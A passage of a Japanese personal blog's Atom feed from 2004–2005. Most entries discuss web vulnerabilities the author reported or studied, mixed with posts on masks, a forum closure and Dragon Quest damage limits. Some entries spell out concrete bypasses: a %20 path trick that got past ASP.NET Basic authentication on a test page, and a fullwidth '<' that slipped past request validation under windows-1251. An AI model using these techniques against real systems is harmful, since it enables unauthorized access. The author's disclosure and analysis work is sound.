href="http://www.unicharm.co.jp/mask/pop050331.html">「ユニ・チャーム超立体マスク」の品薄についてのお詫び</a> <em class="domain-info">(www.unicharm.co.jp)</em>という文書が公開されていますね (こじまさん情報ありがとうございます)。それから、「ユニチャーム」は「ユニ・チャーム」が正解のようですので修正しました。</p><ul class="comment-link"><li><a href="../topic/2236/comment">「超立体マスクがない」へのコメント (6件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E5%87%BA%E6%9D%A5%E4%BA%8B">出来事</a> / <a href="../genre/%E8%8A%B1%E7%B2%89">花粉</a></span></p></div></div></content></entry><entry><title>フォーラム終了</title><link href="http://bakera.jp/ebi/topic/2222" /><id>tag:bakera.jp,2008:/ebi/topic/2222</id><updated>2005-04-03T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2005/3/31">2005年3月31日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/2222">フォーラム終了</a></h2><p class="subinfo"><span class="updated">更新: 2005年4月3日</span></p><div class="quote-and-cite"><blockquote><p>＞GO FPROGORG</p><p>このパソコン通信フォーラムは終了です。今後は http://forum.nifty.com/ へどうぞ</p></blockquote></div><p>というわけで終了。今後は Web フォーラムを使えというお話になります。スクリプトを無効にしていれば安全だろうとは思いますが、ログインできないので発言できないですね。いや、フォームを書き換えたりして頑張ればログインはできなくもないですが、非常に面倒なので。</p><p class="note">※2005-04-03追記: 実は掲示板一覧のページの右上に「ログイン」というリンクがあり、このログインはスクリプト無効でも使えます。そこで一度ログインしておけば問題なく利用できるようです (phinloda さん情報ありがとうございます)。</p><p class="note">※幸いにしてパレットも終了したようですので、脅威は一つ減りましたが……。近々<a href="../../yomoyama/palette-hole">@nifty パレットのセキュリティホール まとめ</a>は復活、かな。</p><ul class="comment-link"><li><a href="../topic/2222/comment">「フォーラム終了」へのコメント (2件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%83%8B%E3%83%95%E3%83%86%E3%82%A3">ニフティ</a></span></p></div></div></content></entry><entry><title>Cookie の secure フラグの動作が謎</title><link href="http://bakera.jp/ebi/topic/1359" /><id>tag:bakera.jp,2008:/ebi/topic/1359</id><updated>2005-03-20T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/8/9">2004年8月9日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/1359">Cookie の secure フラグの動作が謎</a></h2><p class="subinfo"><span class="updated">更新: 2005年3月20日</span></p><p>とある HTTPS なログインフォームに ID とパスワードを入れてログインすると、セッション Cookie が発行されます。その Cookie には secure フラグがついていません。ここで、ドメインをそのままにスキームだけ HTTP に変えた URL に誘導してやると、非 SSL で Cookie: フィールドが流れる……。</p><p>……と思いきや、何故か Cookie: フィールドは送られず。何でやねん。</p><p>気を取り直して Firefox で試してみたら、しっかり Cookie は流れました。しかし IE6 では何度やっても Cookie 流れず。うーん、あえてそういうふうにしてあるのですかね?</p><p class="note">※2005-03-20追記: Cookie に secure フラグがついていない件は脆弱性として処理され、修正されました。</p><ul class="comment-link"><li><a href="../topic/1359/comment">「Cookie の secure フラグの動作が謎」へのコメント (2件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%83%8B%E3%83%95%E3%83%86%E3%82%A3">ニフティ</a> / <a href="../genre/%E3%82%B3%E3%82%B3%E3%83%AD%E3%82%B0">ココログ</a> / <a href="../genre/Internet%20Explorer">Internet Explorer</a> / <a href="../genre/SSL%EF%BC%8FTLS">SSL/TLS</a></span></p></div></div></content></entry><entry><title>アクセス権があるユーザでも不正アクセスになるか?</title><link href="http://bakera.jp/ebi/topic/2204" /><id>tag:bakera.jp,2008:/ebi/topic/2204</id><updated>2005-03-20T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2005/3/19">2005年3月19日(土曜日)</a></h1><div class="topic"><h2><a href="../topic/2204">アクセス権があるユーザでも不正アクセスになるか?</a></h2><p class="subinfo"><span class="updated">更新: 2005年3月20日</span></p><p>あるところに「会員限定」の掲示板がありました。それは会員だけが読めることになっていて、ID とパスワードを入力してログインすれば内容を読むことができます。私も会員ですので、ID とパスワードを入れて内容を読むことができました。</p><p>ところがある日、不意に嫌な予感がしたわけです。それは、「URL の一部を変えるだけで、内容がノーパスワードで読めてしまうのではないか?」という、非常に不吉な予感なのでした。</p><p>予感が当たっているのかどうかを確かめるのはとても簡単なのですが、一つ問題があります。予感が当たっていて、ノーパスワードでその掲示板の内容を読めてしまったら、それは不正アクセス禁止法に抵触するかもしれないのです。</p><p>そもそも私は正規のユーザですから、その私がノーパスワードで内容を読んだとしても、誰にも迷惑はかからないでしょう。しかし、これが「不正アクセス行為の禁止等に関する法律」の 3条 2項 3号で規定されている「不正アクセス行為」に該当する可能性は否定できません。</p><div class="quote-and-cite"><blockquote cite="http://law.e-gov.go.jp/htmldata/H11/H11HO128.html"><p>電気通信回線を介して接続された他の特定電子計算機が有するアクセス制御機能によりその特定利用を制限されている特定電子計算機に電気通信回線を通じてその制限を免れることができる情報又は指令を入力して当該特定電子計算機を作動させ、その制限されている特定利用をし得る状態にさせる行為</p></blockquote><p class="cite">以上、<a href="http://law.e-gov.go.jp/htmldata/H11/H11HO128.html">不正アクセス行為の禁止等に関する法律</a> より</p></div><p>問題の掲示板にはログインフォームがあり、ID やパスワードの入力によって会員限定掲示板の内容が読めるようになっていますから、明らかにアクセス制御機能を備えていると言えるでしょう。「たまたま FTP のポートが開いていたから不正アクセス」とかいう訳の分からない話ではありません。</p><p class="note">※もっとも、「URL の一部を変えるだけで簡単にアクセスできる状態では、アクセス制御機能を有しているとは言いがたい」という主張はできるかもしれません。アクセス制御機能を欠いている状態であれば不正アクセスにはならないわけです。しかし、そのような主張が通るのかどうか、そこがちょっと自信ないわけです。</p><p>というわけでちょっと困ったのですが、不正アクセスにならないことが確実な方法を思いつきましたので、それを実行に移すことにしました。同法の 3条 2項 2号にはこうあります。</p><div class="quote-and-cite"><blockquote cite="http://law.e-gov.go.jp/htmldata/H11/H11HO128.html"><p>アクセス制御機能を有する特定電子計算機に電気通信回線を通じて当該アクセス制御機能による特定利用の制限を免れることができる情報（識別符号であるものを除く。）又は指令を入力して当該特定電子計算機を作動させ、その制限されている特定利用をし得る状態にさせる行為（当該アクセス制御機能を付加したアクセス管理者がするもの及び<em>当該アクセス管理者の承諾を得てするものを除く。次号において同じ。</em>）</p></blockquote><p class="cite">以上、<a href="http://law.e-gov.go.jp/htmldata/H11/H11HO128.html">不正アクセス行為の禁止等に関する法律</a> より</p><p class="citenote">※強調は引用者による</p></div><p>要は、管理者の許可を得て試せば OK というただそれだけの話です。今回は幸いにしてアクセス管理者が理解ある方だったので、特に問題なく許可をいただくことができました (ありがとうございました)。</p><p>ただ、いつもこうして許可がいただけるとは限らないわけでして、そこがなんとも難儀なところです。アクセス権があるユーザがアクセス制御機能を回避しても実害は全くないのですが、不正アクセス禁止法はそういう「実害」を避けるための法律ではない、というところがミソなのでしょうね。こういう、一般人の意識と<ruby><rb>乖離</rb><rp>(</rp><rt>かいり</rt><rp>)</rp></ruby>したところが実に厄介です。</p><p class="note">※2005-03-20追記: 届け出ようと思って様式を書いている時に問題の (許可を得てテストした) URL を確認したところ、アクセスできなくなっていました。というわけで修正されたようです。</p><ul class="comment-link"><li><a href="../topic/2204/comment">「アクセス権があるユーザでも不正アクセスになるか?」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>msearch におけるディレクトリトラバーサルの脆弱性</title><link href="http://bakera.jp/ebi/topic/2197" /><id>tag:bakera.jp,2008:/ebi/topic/2197</id><updated>2005-03-17T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2005/3/9">2005年3月9日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/2197">msearch におけるディレクトリトラバーサルの脆弱性</a></h2><p class="subinfo"><span class="updated">更新: 2005年3月17日</span></p><p><a href="http://jvn.jp">JVN</a> <em class="domain-info">(jvn.jp)</em> で「<a href="http://jvn.jp/jp/JVN%238BAAAB4E/index.html">msearch におけるディレクトリトラバーサルの脆弱性</a> <em class="domain-info">(jvn.jp)</em>」というものが公開されました。</p><p>JVN の記述は微妙です。設定ファイルや設定ファイルと同じフォーマットのファイルが見えるのではなくて、インデックスファイルと同じフォーマットのファイルが見えるという問題だと思いますが……。</p><p class="note">※設定ファイルと同じフォーマットのファイルが「たまたま」存在した場合はその設定で msearch を動かすことができてしまいますが、そのファイルの内容を閲覧することはできないはず。フォーマットが違う場合はエラーメッセージが出るだけです。</p><p class="note">※2005-03-17追記: JVN の記述は修正され、インデックスファイルについて追記されました。</p><p>まあそれは良いとして、「参考情報」としてリンクされている PDF 文書は何なのでしょうね。詳細な情報があるわけでもなく、何を意図したものか良く分からないのですが、もしや Microsoft の「絵で見る……」を意識しているのでしょうか。</p><ul class="comment-link"><li><a href="../topic/2197/comment">「msearch におけるディレクトリトラバーサルの脆弱性」へのコメント (12件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/IPA">IPA</a></span></p></div></div></content></entry><entry><title>ココログにはビジネスユースもある</title><link href="http://bakera.jp/ebi/topic/2148" /><id>tag:bakera.jp,2008:/ebi/topic/2148</id><updated>2005-02-23T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2005/1/23">2005年1月23日(日曜日)</a></h1><div class="topic"><h2><a href="../topic/2148">ココログにはビジネスユースもある</a></h2><p class="subinfo"><span class="updated">更新: 2005年2月23日</span></p><p>「<a href="http://www.st.ryukoku.ac.jp/%7Ekjm/security/ml-archive/connect24h/2005.01/msg00112.html">[connect24h:8297] Re: 銀行のサーバが攻撃されていました。</a> <em class="domain-info">(www.st.ryukoku.ac.jp)</em>」を読んで知ったのですが、ココログをビジネスで使用している企業というのがあるそうですね。</p><p>ココログに関しては、所詮個人の趣味の blog だろうし、セキュリティに関しては多少のことは気にしなくて良いだろうという判断をしていました。しかしビジネスユースがあるとなると……。</p><p class="note">※2005-02-23 追記: ココログの脆弱性として 2件ほど届け出ましたが、1件は修正、1件は脆弱性ではないとして取扱い終了となりました。<a href="../topic/2181">ココログの SSI インジェクション</a>参照。</p><ul class="comment-link"><li><a href="../topic/2148/comment">「ココログにはビジネスユースもある」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%83%A1%E3%83%A2">メモ</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%83%8B%E3%83%95%E3%83%86%E3%82%A3">ニフティ</a> / <a href="../genre/%E3%82%B3%E3%82%B3%E3%83%AD%E3%82%B0">ココログ</a> / <a href="../genre/IPA">IPA</a></span></p></div></div></content></entry><entry><title>ASP.NET に XSS?</title><link href="http://bakera.jp/ebi/topic/2177" /><id>tag:bakera.jp,2008:/ebi/topic/2177</id><updated>2005-02-20T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2005/2/17">2005年2月17日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/2177">ASP.NET に XSS?</a></h2><p class="subinfo"><span class="updated">更新: 2005年2月20日</span></p><p><a href="http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2005/02.html#20050218_ASP.Net">セキュリティホールmemo</a> <em class="domain-info">(www.st.ryukoku.ac.jp)</em>から、<a href="http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2005.02/msg00339.html">XSS vulnerabilty in ASP.Net [with details]</a> <em class="domain-info">(www.st.ryukoku.ac.jp)</em>というお話。</p><p>タイトルだけ見たら ASP.NET 自体にミドルウェアの欠陥として <dfn class="glossary"><a href="../../glossary/XSS">XSS</a></dfn> が存在するかのように思えたので焦りましたが、そうではないみたいですね。</p><p>ASP.NET には、危険なリクエストを受けると例外をスローする validateRequest という機能があります。これはデフォルトで有効になっていて、プログラマがサニタイズを怠っていても問題が起きにくいようになっています。たとえば、POST されてきたクエリに &lt;script&gt; という文字列が含まれていると、こんなメッセージが出たりするわけです。</p><div class="quote-and-cite"><blockquote><p>危険な可能性のある Request.Form 値がクライアントから検出されました。</p><p>説明 : 要求の検証により、危険性のあるクライアント入力値が検出されました。要求の処理は中止されました。この値は、クロス サイト スクリプト攻撃などのアプリケーションのセキュリティ問題を引き起こす可能性があります。ページ ディレクティブか、 構成セクションの validateRequest=false を設定することによって要求の検証を無効にできます。しかしこの場合、アプリケーションですべての入力を明示的に確認することをお勧めします。</p></blockquote></div><p>ところが、&lt; のかわりに全角の(U+FF1Cの)「＜」を使用すると、この検証を通り抜けます。さらに、responseEncoding を windows-1251 (キリル文字) にしていると、これが正規化されて &lt; に変化し、結果的に貫通してしまうという話のようです。</p><p>というわけなのですが、プログラマが外部入力値をサニタイズしていれば問題ありません。ASP.NET の機能に甘えず、きっちりサニタイズしておきましょうということで。</p><p class="note">※ちなみに、ここではそもそも validateRequest を無効にしてあります。経緯については <a href="../../htmlbbs/article/138">掲示板の #138</a> あたりを参照。</p><p class="note">※2005-02-20 追記: これは validateRequest に限った問題ではなく、responseEncoding が windows- 系の場合は全角のものもサニタイズしないといけないですね。<a href="../topic/1206">CultureInfo.InvariantCulture の話</a>というのは、こういう局面で生きてくるのでしょう。</p><ul class="comment-link"><li><a href="../topic/2177/comment">「ASP.NET に XSS?」へのコメント (12件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/ASP.NET">ASP.NET</a> / <a href="../genre/%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E8%84%86%E5%BC%B1%E6%80%A7">クロスサイトスクリプティング脆弱性</a></span></p></div></div></content></entry><entry><title>ASP.NET の脆弱性?</title><link href="http://bakera.jp/ebi/topic/2000" /><id>tag:bakera.jp,2008:/ebi/topic/2000</id><updated>2005-02-10T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/10/7">2004年10月7日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/2000">ASP.NET の脆弱性?</a></h2><p class="subinfo"><span class="updated">更新: 2005年2月10日</span></p><p>「<a href="http://www.microsoft.com/japan/security/incident/aspnet.mspx">報告された Microsoft ASP.NET の脆弱性に関する情報</a> <em class="domain-info">(www.microsoft.com)</em>」って良く意味が分からないのですが、「<a href="http://support.microsoft.com/?scid=kb;ja;887459">ASP.NET の正規化の問題をプログラムによって確認する方法</a> <em class="domain-info">(support.microsoft.com)</em>」ではまず "\" をサニタイズしているようですので、\ と / を正規化するあたりに何かあるのかも。</p><p>ASP.NET では、たとえば http://……/%5c/test.aspx なんてのをリクエストしても http://……/test.aspx が何事もなく実行されるようになっていて、Request.Path やら Request.PhysicalPath にも何事もなかったかのように /test.aspx なり c:\……\test.aspx なりが格納されています。Request.Url.ToString() も http://……/test.aspx となっていて、いずれも %5c はどこかに消え去っています。</p><p>つまり ASP.NET では URL がプログラムに渡る前の前処理として URL を正規化していて、よけいなバックスラッシュなどは消えるようになっているのです。今回の話は、このどこかに穴があってバックスラッシュが (あるいは他のヤバイ文字が) 貫通してくるという話なのでしょうか?</p><p>ともあれ続報待ちな感じですね。</p><p class="note">※2005-02-10 追記: 修正されました。「<a href="http://www.microsoft.com/japan/technet/security/bulletin/ms05-004.mspx">ASP.NET パス検証の脆弱性 MS05-004</a> <em class="domain-info">(www.microsoft.com)</em>」</p><ul class="comment-link"><li><a href="../topic/2000/comment">「ASP.NET の脆弱性?」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/Microsoft">Microsoft</a> / <a href="../genre/.NET">.NET</a> / <a href="../genre/ASP.NET">ASP.NET</a></span></p></div></div></content></entry><entry><title>global.asax のそれは不十分なんだって……</title><link href="http://bakera.jp/ebi/topic/2013" /><id>tag:bakera.jp,2008:/ebi/topic/2013</id><updated>2005-02-10T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/10/18">2004年10月18日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/2013">global.asax のそれは不十分なんだって……</a></h2><p class="subinfo"><span class="updated">更新: 2005年2月10日</span></p><p><a href="http://itpro.nikkeibp.co.jp/">IT Pro</a> <em class="domain-info">(itpro.nikkeibp.co.jp)</em> に、<a href="../topic/2002">ASP.NET の脆弱性</a>関連の記事が出ていますが……。</p><div class="quote-and-cite"><blockquote cite="http://itpro.nikkeibp.co.jp/members/ITPro/ITBASIC/20041013/151179/"><p>マイクロソフトは，おそらく「Webサーバー管理者の中には，ソースコードを読めない人がいる」と判断し，2日後に，公開したソースコードを実装した修正パッチ（Microsoft.Web.ValidatePathModule.dll）を用意したものと思われます。</p></blockquote><p class="cite">以上、IT Proの<a href="http://itpro.nikkeibp.co.jp/members/ITPro/ITBASIC/20041013/151179/">Windowsユーザーのためのワンポイント・レッスン　第44回 : IT Pro １週間で学ぶIT基礎の基礎</a> より</p></div><p>いやいや、ValidatePathModule はそのコードの実装ではありません。global.asax にそのコードを追加しても exploit は通ってしまいます (<a href="../topic/2002">ASP.NET の脆弱性!</a>参照) が、ValidatePathModule をインストールすれば exploit が通らなくなります (少なくとも私が試した範囲では通りませんでした)。global.asax でのサニタイズはこの問題の対策としては不十分で、対策には ValidatePathModule のインストールが必要だということです。</p><p class="note">※なお、このサーバにはあえて ValidatePathModule はインストールしてありません。</p><p>……というようなことがちゃんとアナウンスされていないから誤解を招くのだろうなぁ。まあ、</p><div class="quote-and-cite"><blockquote cite="http://www.microsoft.com/japan/security/incident/aspnet.mspx"><p>さらに情報やリソースを公開できるようになれば、順次このページを更新する予定です。</p><p class="snip"><em>(～中略～)</em></p><p>この種類のセキュリティ問題からお客様を保護するためのガイダンスの他に、マイクロソフトは、ASP.NET にセキュリティ更新プログラムを提供するための作業を行っています。その更新プログラムにより、お客様に追加の保護策が提供されます。マイクロソフトは、その更新プログラムの展開のための品質のレベルが適切なものになった後、その更新プログラムをリリースする予定です。</p></blockquote><p class="cite">以上、<a href="http://www.microsoft.com/japan/security/incident/aspnet.mspx">報告された Microsoft ASP.NET の脆弱性に関する情報</a> より</p></div><p>ということなので、これは Microsoft としてもまだ暫定情報という扱いなのでしょう。状況を整理すると、</p><ul><li>Microsoft はこの脆弱性情報を認知している</li><li>問題を緩和する要素として ValidatePathModule がリリースされている (しかしこれはパッチではない)</li><li>パッチは準備中 (まだ出ていない)</li><li>それはそれとして、global.asax で URL をサニタイズすることを推奨</li></ul><p>という感じかと。</p><p>記事では ValidatePathModule をパッチとして紹介していますが、ValidatePathModule は ASP.NET 用の URL Scan のようなもので、この問題の本質を解決しているわけではありません。上記引用部からしてパッチは別途出る予定だと言っていますし、それはそれで適用する必要があるでしょう。Code Red は URL Scan で防げますが、やっぱり MS01-033 は当てないとね……ということで。</p><p class="note">※2005-02-10 追記: 修正されました。「<a href="http://www.microsoft.com/japan/technet/security/bulletin/ms05-004.mspx">ASP.NET パス検証の脆弱性 MS05-004</a> <em class="domain-info">(www.microsoft.com)</em>」</p><ul class="comment-link"><li><a href="../topic/2013/comment">「global.asax のそれは不十分なんだって……」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/Microsoft">Microsoft</a> / <a href="../genre/ASP.NET">ASP.NET</a> / <a href="../genre/ITpro">ITpro</a></span></p></div></div></content></entry><entry><title>ASP.NET の脆弱性!</title><link href="http://bakera.jp/ebi/topic/2002" /><id>tag:bakera.jp,2008:/ebi/topic/2002</id><updated>2005-02-10T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/10/8">2004年10月8日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/2002">ASP.NET の脆弱性!</a></h2><p class="subinfo"><span class="updated">更新: 2005年2月10日</span></p><p>「<a href="../topic/2000">ASP.NET の脆弱性?</a>」の話ですが、<a href="http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/10.html#20041006_ASP.NET">セキュリティホールmemo で詳細が紹介</a> <em class="domain-info">(www.st.ryukoku.ac.jp)</em>されていました。</p><p>これ、どうやら Basic 認証が貫通するという話のようですね。認証かけていない場合は関係ないみたいで一安心?</p><p>参考までに Basic 認証をかけた ASP.NET なページを用意してみました。<a href="../../bug/auth-test.aspx">http://bakera.jp/bug/auth-test.aspx</a> に普通にアクセスすると、401 になる (パスワードを求められる) はずです。</p><p>%5c などは URL Scan で蹴られたりしますが、http://bakera.jp/%20/bug/auth-test.aspx とやるとあっさり貫通するようですね。「<a href="http://support.microsoft.com/?scid=kb;ja;887459">ASP.NET の正規化の問題をプログラムによって確認する方法</a> <em class="domain-info">(support.microsoft.com)</em>」に出ている対策は行ってあるのですが、それでは不十分のようです。</p><p class="note">※……というか、global.asax の Application_BeginRequest() の中でも正規化された後の値しか受け取れていないような気がするのですが、気のせいなのかなあ。気のせいでないとすると、そもそも対策に意味がないと思うわけですが。</p><p class="note">※追記 :「<a href="http://www.microsoft.com/japan/security/incident/aspnet.mspx">報告された Microsoft ASP.NET の脆弱性に関する情報</a> <em class="domain-info">(www.microsoft.com)</em>」が更新され、<a href="http://www.microsoft.com/downloads/details.aspx?familyid=DA77B852-DFA0-4631-AAF9-8BCC6C743026&amp;displaylang=en">Microsoft ASP.NET ValidatePath Module</a> <em class="domain-info">(www.microsoft.com)</em> というものが公開されています。ひとまずこれで回避できるようです。</p><p class="note">※2005-02-10 追記: 修正されました。「<a href="http://www.microsoft.com/japan/technet/security/bulletin/ms05-004.mspx">ASP.NET パス検証の脆弱性 MS05-004</a> <em class="domain-info">(www.microsoft.com)</em>」</p><ul class="comment-link"><li><a href="../topic/2002/comment">「ASP.NET の脆弱性!」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/Microsoft">Microsoft</a> / <a href="../genre/.NET">.NET</a> / <a href="../genre/ASP.NET">ASP.NET</a></span></p></div></div></content></entry><entry><title>イーバンク銀行のリダイレクタ</title><link href="http://bakera.jp/ebi/topic/2095" /><id>tag:bakera.jp,2008:/ebi/topic/2095</id><updated>2005-01-25T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/12/7">2004年12月7日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/2095">イーバンク銀行のリダイレクタ</a></h2><p class="subinfo"><span class="updated">更新: 2005年1月25日</span></p><p>とりあえずメモのみ……<a href="http://takagi-hiromitsu.jp/diary/20041205.html#p03">「メールで尋ねることはしていない」という一つ覚え </a> <em class="domain-info">(takagi-hiromitsu.jp)</em></p><p>メール中の URL は HTTP ですが、アクセスすると HTTPS な URL にリダイレクトされるようですね。何故そのようなことをしているのかは全く理解できませんが。</p><p class="note">※……などと書いていて、もういちど高木さんの日記の内容を確認しようと思ったら <dfn class="glossary">503</dfn> を喰らってしまいました。各所で話題になっていて重くなっているのかしら。</p><p class="note">※2005-01-25 追記: しかも、意味がないだけならまだしも脆弱性があったので IPA に届け出ました。現在では無事修正されています。</p><ul class="comment-link"><li><a href="../topic/2095/comment">「イーバンク銀行のリダイレクタ」へのコメント (3件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/IPA">IPA</a></span></p></div></div></content></entry><entry><title>サイトのウィルス対策?</title><link href="http://bakera.jp/ebi/topic/2080" /><id>tag:bakera.jp,2008:/ebi/topic/2080</id><updated>2005-01-25T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/11/19">2004年11月19日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/2080">サイトのウィルス対策?</a></h2><p class="subinfo"><span class="updated">更新: 2005年1月25日</span></p><p>「<a href="http://pcweb.mycom.co.jp/articles/2004/11/18/universalon/">【レポート】三越の「お客様本位」から生まれたWebアクセシビリティ</a> <em class="domain-info">(pcweb.mycom.co.jp)</em>」という記事があったので、<a href="http://www.mitsukoshi.co.jp/">三越オンラインショッピング</a> <em class="domain-info">(www.mitsukoshi.co.jp)</em>にアクセスしてみると……。</p><div class="quote-and-cite"><blockquote><p>このページではJavascriptを使用しています。Javascriptをサポートしたブラウザをご利用ください。</p><p>※お買い物時はセキュリティのレベルを「中」でご利用ください。（弊社サイトは最新のウイルス対策をしております）</p></blockquote></div><p>うーん、これが「お客様本位から生まれたWebアクセシビリティ」ですか……。</p><p>しかも「（弊社サイトは最新のウイルス対策をしております）」って意味が分からないです。ウィルス対策をしていても脆弱性があったら意味がないですよね。</p><p class="note">※2005-01-25 追記: そして実際に脆弱性があったわけですが、修正されています。</p><ul class="comment-link"><li><a href="../topic/2080/comment">「サイトのウィルス対策?」へのコメント (3件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%A2%E3%82%AF%E3%82%BB%E3%82%B7%E3%83%93%E3%83%AA%E3%83%86%E3%82%A3">アクセシビリティ</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/IPA">IPA</a></span></p></div></div></content></entry><entry><title>最大ダメージに疑問</title><link href="http://bakera.jp/ebi/topic/2144" /><id>tag:bakera.jp,2008:/ebi/topic/2144</id><updated>2005-01-22T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2005/1/21">2005年1月21日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/2144">最大ダメージに疑問</a></h2><p class="subinfo"><span class="updated">更新: 2005年1月22日</span></p><p>以前、<a href="../topic/2121">ドラクエ8の最大ダメージは 9999 という話</a>を書きましたが、違うかもしれません。</p><p>MP が十分に高いゼシカがスーパーハイテンション状態でマダンテを使うと、ほとんどの敵に 5008 のダメージを与えます。ところが、狂った竜神王に対しては、何故かぴったり 5000 のダメージとなります。この 5000 という数字はどこから出てくるのでしょうか?</p><p>調べてみると、どうも竜神王は炎系の攻撃全般に強めの耐性があるらしく、マダンテのダメージも半減するようです。半減で 5000 というのはきりの良い数字です。9999ダメージを半減して 5000 になっている可能性が高いと思われます。</p><p>また、竜神王にディバインスペルを使ってからマダンテを撃つと、ちゃんと 5008 ダメージになることが確認できました。</p><p>このことから、ダメージ計算の際、ダメージを 9999 に補正する処理よりも後で耐性の処理をしていることが推測できます。また、ディバインスペルの処理も 9999 補正より後であることが分かります (あるいは耐性値そのものを修正しているのかも)。呪文のダメージ上限の処理は、それらよりも後に入っているようです。</p><p>普通に考えるとダメージを 9999 に補正する処理が 2回入っているとは考えにくいので、以下のような順で処理していると考えられます。</p><ul><li>いろいろ計算してダメージを算出</li><li>ダメージが 9999 を超えていたら 9999 に修正</li><li>耐性とディバインスペルによるダメージ修正</li><li>呪文などの場合、最大ダメージを超えていたら最大値に修正</li></ul><p>これは最大ダメージが 9999 を超える可能性があることを示唆しています。耐性のない敵にディバインスペルをかければ、9999 ダメージに修正された後でダメージが増えるはずだからです。</p><p>これは仮説に過ぎず、最後にもう一度「9999 に修正」という処理をしている可能性もあります。検証したいのですが、検証は困難です。可能性があるのは攻撃力依存の属性攻撃で、たとえば「かえん斬り」などですが、9999ダメージを超えるためにはどれだけのちからのたねが必要になることやら……。</p><p class="note">※2005-01-22追記 : 検証しました。<a href="../topic/2146">9999 OVER</a>参照のこと。</p><ul class="comment-link"><li><a href="../topic/2144/comment">「最大ダメージに疑問」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%B2%E3%83%BC%E3%83%A0">ゲーム</a> / <a 